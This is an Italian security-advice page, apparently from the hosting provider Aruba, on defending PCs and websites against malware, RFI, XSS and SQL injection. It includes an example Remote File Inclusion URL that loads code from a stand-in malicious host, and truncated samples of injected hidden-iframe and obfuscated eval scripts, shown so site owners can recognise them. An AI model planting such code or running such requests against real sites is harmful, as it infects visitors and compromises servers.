Consigli pratici e suggerimenti utili per difendere il proprio Pc dagli attacchi esterni, come virus,
Malware,
Phishing e
Keyloggers.
Per garantire la sicurezza del proprio Pc è opportuno seguire alcune pratiche di sicurezza:
Per non incorrere in problemi di sicurezza sulle pagine del proprio sito è necessario mantenere in sicurezza le applicazioni web pubblicate. È infatti possibile che
pagine il cui codice non sia scritto in modo sicuro siano vulnerabili a vari tipi di attacchi, quali XSS o SQL injection. Questo tipo di vulnerabilità sono indipendenti dalla sicurezza del webserver, in quanto vengono sfruttate con normali richieste HTTP, appositamente formate per utilizzare il codice delle pagine web in modo fraudolento. Le misure da seguire per la sicurezza si differenziano a seconda che si tratti di:
- Applicazioni sviluppate da terzi
Per pubblicare il proprio sito è possibile trovare in rete una moltitudine di applicazioni preconfezionate, scritte in vari linguaggi, e con supporto a diversi tipi di Database. Le tipologie di questi applicativi comprendono forum, ecommerce, webmail, guestbook e molto altro ancora. Tali applicativi possono presentare vulnerabilità di vario genere, per prevenire i possibili attacchi verificare periodicamente la presenza di versioni aggiornate delle applicazioni utilizzate, in genere gli aggiornamenti sono disponibili direttamente dalla Home Page dello sviluppatore. Per essere efficaci gli aggiornamenti vanno ripetuti almeno una volta al mese. Non sempre, però, un'applicazione aggiornata alla sua ultima versione è sicura. Per reperire informazioni sulle vulnerabilità note e su quali versioni di applicativo ne sono affette sono disponibili:
Nel caso in cui una delle applicazioni che si sta utilizzando non sia attualmente sicura si consiglia di sospenderne l'utilizzo o di cercare altra applicazione similare non affetta da vulnerabilità.
- Applicazioni sviluppate in proprio
In caso di applicazioni sviluppate in proprio, cercare di realizzarle in modo che non siano vulnerabili perlomeno a RFI (Remote File Inclusion), tecnica che permette di richiamare via Url il contenuto di una pagina differente da quella caricata e visualizzare sensibili informazioni sul contenuto del proprio sito. In genere questo tipo di vulnerabilità viene sfruttato con richieste HTTP simili alla seguente:
http:// www.nomedominio.com/index.php?agina=http://www.sitomalevolo.com/malware.php ?
Dove index.php è la propria pagina web contenente la vulnerabilità e malware.php è invece una pagina con codice malevolo pubblicata su un server esterno. Tramite queste richieste viene tentata l'esecuzione del codice malevolo remoto sul server dove risiede il proprio Dominio.
Evitare SQLInjection (inoculazione di query sql indesiderate) sul proprio database mysql-mssql. Una descrizione di questo tipo di vulnerabilità è disponibile alla pagina: https://it.wikipedia.org/wiki/SQL_injection
In rete è inoltre possibile trovare numerose guide per la scrittura di codice sicuro nei vari linguaggi di programmazione.
La prima cosa da fare è
rimuovere tutto il codice malevolo eventualmente presente nelle pagine web dei propri siti.
- Nel caso si pensi che il proprio PC sia infetto sono disponibili anche numerosi tool per la scansione online del computer, ad esempio tra i più conosciuti esemplifichiamo:
- Verificare eventuali infezioni presenti nel proprio computer. Nel caso in cui per la pubblicazione del sito ci si avvalga di collaboratori e/o webmaster, verificare l'integrità di tutti i computer utilizzati. È sufficiente che uno solo di questi sia vulnerabile o infetto per subire il furto delle credenziali di accesso.
- Verificare se sono disponibili aggiornamenti per le applicazioni web utilizzate. Spesso, infatti, queste presentano vulnerabilità nelle vecchie versioni e rappresentano quindi un facile ingresso se non aggiornate.
- Ripulire i PC infetti tramite antivirus ed antiMalware, e attivare le opportune protezioni per evitare il ripetersi di simili problemi.
- Dopo aver messo in sicurezza ogni computer utilizzato, procedere con il cambio di tutte le credenziali di accesso utilizzate in precedenza. Anche se non ci è possibile dare indicazioni sicure sui dati di accesso di servizi non gestiti da Aruba (home banking, social network etc...) è assolutamente consigliabile cambiare anche tali dati, rivolgendosi eventualmente ai rispettivi fornitori del servizio.
Nel caso in cui alla verifica del proprio computer non si individuino Malware attivi. È comunque necessario effettuare il cambio delle credenziali di accesso in quanto quelle utilizzate in precedente potrebbero essere compromesse.
Per Windows e Linux
Antivirus e Firewall:
Per chi utilizza sistemi Windows, Linux e Unix
Di seguito alcuni esempi di codice che, attraverso applicazioni web vulnerabili o furto delle proprie credenziali di accesso al sito, può essere inserito nelle pagine web del proprio sito:
<script>function v47e ...etc... 4950543E'));</script>
<iframe src='http://url_contenente_malware' width='1' height='1' style='visibility: hidden;'></iframe>
<script language="javascript">$= ...etc... ;eval(unescape($));document.write($);</script>
<!-- ~ -->
<div style="visibility:hidden">
<iframe src="http://url_contenente_malware" width=100 height=80></iframe>
</div>
<!-- ~ -->
In genere questi codici hanno una o più delle seguenti caratteristiche:
- Proprietà "visibility: hidden" per risultare non visibili nella normale navigazione del sito.
- Utilizzano una codifica per nascondere il loro contenuto durante la lettura della pagina sorgente.
- Richiamano pagine esterne ai Server Aruba, generalmente pagine che risiedono su server compromessi e contenenti malware.
Tra le applicazioni potenzialmente più vulnerabili e spesso utilizzate per provocare danni sui siti che si basano su di esse, si individuano:
- Sistemi cms e portali
Tutti i *nuke e derivati - phpnuke, postnuke, sfm, invision, aspnuke, wordpress, mambo, joomla, ecc..
- Guestbook
web wiz, matt, ecc
- Forums
phpbb, invision, vbulletin, snitz ecc
- News
web wiz, moduli per cms, ecc Moduli vari per cms gallery, chat, avatars, upload ecc
- Free PHP
ODP Script ipershop, applicazione in asp/vbscript.encode, con database access (iper_ita.mdb), phpODP
Sono inoltre sconsigliati i file di tipo torrent per la condivisione di files con software BitTorrent.
Applicazioni reperibili in rete possono creare destabilizzazioni al server che ospita il Dominio. Qualora questo dovesse verificarsi, è inviata una notifica all'indirizzo email di riferimento relativo al Dominio interessato.